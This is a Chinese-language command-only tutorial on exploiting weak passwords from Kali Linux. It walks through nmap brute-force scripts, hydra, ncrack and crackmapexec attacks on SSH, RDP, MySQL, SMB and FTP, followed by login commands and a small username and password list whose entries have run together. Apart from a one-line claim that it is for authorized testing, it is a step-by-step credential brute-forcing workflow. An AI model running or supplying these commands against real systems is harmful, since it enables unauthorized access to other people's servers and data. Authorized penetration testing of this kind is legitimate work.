Kali Linux弱口令利用教程:SSH/RDP/MySQL/SMB/FTP
纯命令教程,仅用于已授权测试环境。
1. SSH 弱口令(22端口)
扫描是否存在弱口令
nmap --script=ssh-brute -p 22 目标IP
Hydra 爆破
hydra -L 用户字典.txt -P 密码字典.txt ssh://目标IP -t 4
成功后登录
ssh 用户名@目标IP
2. RDP 弱口令(3389端口)
Nmap 脚本检测
nmap --script=rdp-brute -p 3389 目标IP
Hydra 爆破
hydra -L 用户字典.txt -P 密码字典.txt rdp://目标IP -t 1
ncrack 爆破(更稳)
ncrack -U 用户字典.txt -P 密码字典.txt rdp://目标IP:3389
登录
rdesktop 目标IP
或直接用系统远程桌面连接。
3. MySQL 弱口令(3306端口)
检测空密码/弱密码
nmap --script=mysql-empty-password,mysql-brute -p 3306 目标IP
Hydra 爆破
hydra -L 用户字典.txt -P 密码字典.txt mysql://目标IP
成功后登录
mysql -u用户名 -p密码 -h目标IP
4. SMB 弱口令(445端口)
枚举用户/共享
nmap --script=smb-enum-users,smb-enum-shares -p 445 目标IP
爆破
hydra -L 用户字典.txt -P 密码字典.txt smb://目标IP
crackmapexec 快速验证
crackmapexec smb 目标IP -u 用户名 -p 密码
连接共享
smbclient //目标IP/共享名 -U 用户名
5. FTP 弱口令(21端口)
检测匿名/弱密码
nmap --script=ftp-anon,ftp-brute -p 21 目标IP
Hydra 爆破
hydra -L 用户字典.txt -P 密码字典.txt ftp://目标IP
登录
ftp 目标IP
简易字典(测试用)
用户字典 user.txt
rootadmintestuserguest
密码字典 pass.txt
123456adminrootpassword123123test